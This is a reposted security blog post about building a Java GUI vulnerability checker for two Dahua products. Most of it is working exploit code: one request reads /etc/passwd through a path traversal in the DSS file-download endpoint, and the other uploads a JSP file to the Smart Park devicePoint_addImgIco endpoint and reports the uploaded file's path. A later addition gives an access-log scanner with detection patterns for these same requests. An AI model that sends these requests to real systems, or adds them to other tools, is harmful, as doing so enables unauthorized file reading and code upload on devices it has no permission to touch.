A First Attempt at Writing a Java GUI Tool

admin, May 15, 2024, 21:01:54

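Drawing a cat by copying a tiger: working from the "Yonyou NC series detection and exploitation tool" by 说书人 of WgpSec, combined with my limited Java fundamentals and some help from GPT, I learned a bit about writing Java GUI tools and implemented the most basic vulnerability detection feature........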

Using two Dahua vulnerabilities as examples, I tried a POST request and a GET request respectively.

01. Dahua Smart Park devicePoint_addImgIco file upload

02. Dahua DSS file download vulnerability

03. Summary

Just padding the word count......

    import java.io.IOException;
    import java.util.HashMap;
    import java.util.Map;
    import java.util.regex.Matcher;
    import java.util.regex.Pattern;

    // OkHttp types used for the multipart body and the response.
    import okhttp3.MediaType;
    import okhttp3.MultipartBody;
    import okhttp3.RequestBody;
    import okhttp3.Response;

    // httpRequest is the project's own HTTP helper (not shown on this page).
    public class check {

        // Dispatch to the check that matches the selected vulnerability name.
        public String checkAction(Map deserializeMap, String vulName, String url) throws IOException {
            String result;
            if ("dahua_dss_fileDown".equals(vulName)) {
                result = dahua_dss_fileDown(url);
            } else if ("大华智慧园区文件上传".equals(vulName)) {
                result = zhihuiyuanqu_upload(url);
            } else if (vulName.contains("xxx")) {
                String path = (String) deserializeMap.get(vulName);
                result = deserializeAction(url, path, vulName);
            } else {
                // "This PoC has not been added yet"
                result = "该poc暂未收录";
            }
            return result;
        }

        // GET check: Dahua DSS file download. url is expected to end with "/".
        public String dahua_dss_fileDown(String url) {
            Map<String, String> headers = new HashMap<>();
            headers.put("User-Agent", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
            Response response = null;
            try {
                String payload = "portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd";
                response = httpRequest.get(url + payload, headers);
                String statusCode = String.valueOf(response.code());
                String responseBody = response.body().string();
                // Heuristic: a 200 response whose body contains "root" is treated as a hit.
                if ("200".equals(statusCode) && responseBody.contains("root")) {
                    return "[+] 漏洞存在!!!!";
                } else {
                    return "[-] 漏洞不存在";
                }
            } catch (IOException e) {
                return "[-]请求失败:" + e.getMessage();
            } finally {
                if (response != null) {
                    response.close();
                }
            }
        }

        // POST check: Dahua Smart Park devicePoint_addImgIco file upload.
        public String zhihuiyuanqu_upload(String url) {
            Map<String, String> headers = new HashMap<>();
            headers.put("User-Agent", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
            // No manual Content-Type header: MultipartBody sets it together with its own boundary.
    //        headers.put("Content-Type","multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982");
            Response response = null;
            String payload = "emap/devicePoint_addImgIco?hasSubsystem=true";
            // Inner quotes must be escaped inside the Java string literal.
            String data = "<%out.println(\"vultest\");%>";
            RequestBody requestBody = new MultipartBody.Builder()
                    .setType(MultipartBody.FORM)
                    .addFormDataPart("upload", "a.jsp",
                            RequestBody.create(MediaType.parse("application/octet-stream"), data))
                    .build();
            System.out.println(requestBody);
            try {
                response = httpRequest.post(url + payload, headers, requestBody);
                String statusCode = String.valueOf(response.code());
                String responseBody = response.body().string();
                // The response carries the generated file name; extract it with a regex.
                Pattern r = Pattern.compile("ico_res_[0-9a-fA-F]+_on.jsp");
                Matcher m = r.matcher(responseBody);
                // Call m.group() only after a successful find(), otherwise it throws IllegalStateException.
                if ("200".equals(statusCode) && m.find()) {
                    String filePath = url + "upload/emap/society_new/" + m.group();
                    System.out.println(filePath);
                    return "[+] 漏洞存在!!!!\n" + "文件路径:" + filePath;
                } else {
                    return "[-] 漏洞不存在";
                }
            } catch (IOException e) {
                return "[-]请求失败:" + e.getMessage();
            } finally {
                if (response != null) {
                    response.close();
                }
            }
        }

        // Placeholder for deserialization checks: only concatenates its inputs for now.
        public String deserializeAction(String url, String path, String vulName) {
            return url + vulName + path;
        }
    }
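
The two requests this checker sends, and any later request for the uploaded file, leave recognizable entries in a web server's access log. The following is an added example, not code from the original post or from either linked repository, that scans access-log lines for those three request shapes; the class name, the assumed common/combined log format and the sample lines are constructed for illustration.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example: flags access-log lines that match the requests the checker sends.
public class DahuaProbeLogScan {
    // Request line and status in common/combined log format (assumed log layout).
    private static final Pattern LINE =
        Pattern.compile("\"(GET|POST) (\\S+) HTTP/[0-9.]+\" (\\d{3})");
    // The paths below are the ones used by the checker code on this page.
    private static final Pattern FILE_READ = Pattern.compile(
        "(?i)/portal/attachment_downloadByUrlAtt\\.action\\?.*filePath=file(:|%3a)");
    private static final Pattern UPLOAD =
        Pattern.compile("(?i)/emap/devicePoint_addImgIco");
    private static final Pattern UPLOADED_JSP = Pattern.compile(
        "(?i)/upload/emap/society_new/ico_res_[0-9a-f]+_on\\.jsp");

    /** Returns one finding per log line that matches one of the patterns. */
    static List<String> scan(List<String> logLines) {
        List<String> findings = new ArrayList<>();
        for (String line : logLines) {
            Matcher m = LINE.matcher(line);
            if (!m.find()) continue; // skip lines that are not HTTP request entries
            String method = m.group(1), target = m.group(2), status = m.group(3);
            String label = null;
            if ("GET".equals(method) && FILE_READ.matcher(target).find()) {
                label = "file-read request";
            } else if ("POST".equals(method) && UPLOAD.matcher(target).find()) {
                label = "icon-upload request";
            } else if (UPLOADED_JSP.matcher(target).find()) {
                label = "request for uploaded JSP";
            }
            // A 200 status means the server served the request: triage those first.
            if (label != null) findings.add(label + " status=" + status + " " + target);
        }
        return findings;
    }

    public static void main(String[] args) {
        // Constructed sample lines (documentation IP ranges), not real traffic.
        List<String> sample = List.of(
            "203.0.113.7 - - [15/May/2024:21:01:54 +0800] \"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1\" 200 1843",
            "203.0.113.7 - - [15/May/2024:21:02:10 +0800] \"POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\" 200 96",
            "203.0.113.7 - - [15/May/2024:21:02:11 +0800] \"GET /upload/emap/society_new/ico_res_0a1b2c3d_on.jsp HTTP/1.1\" 200 8",
            "198.51.100.20 - - [15/May/2024:21:03:00 +0800] \"GET /index.html HTTP/1.1\" 200 512");
        scan(sample).forEach(System.out::println);
    }
}
```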

The expert's code: https://github.com/wgpsec/YongYouNcTool

The newbie's code: https://github.com/ab0ne/test

Originally published on the WeChat official account (fly的渗透学习笔记): A First Attempt at Writing a Java GUI Tool

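  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work):
                   A First Attempt at Writing a Java GUI Tool https://cn-sec.com/archives/2052255.html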
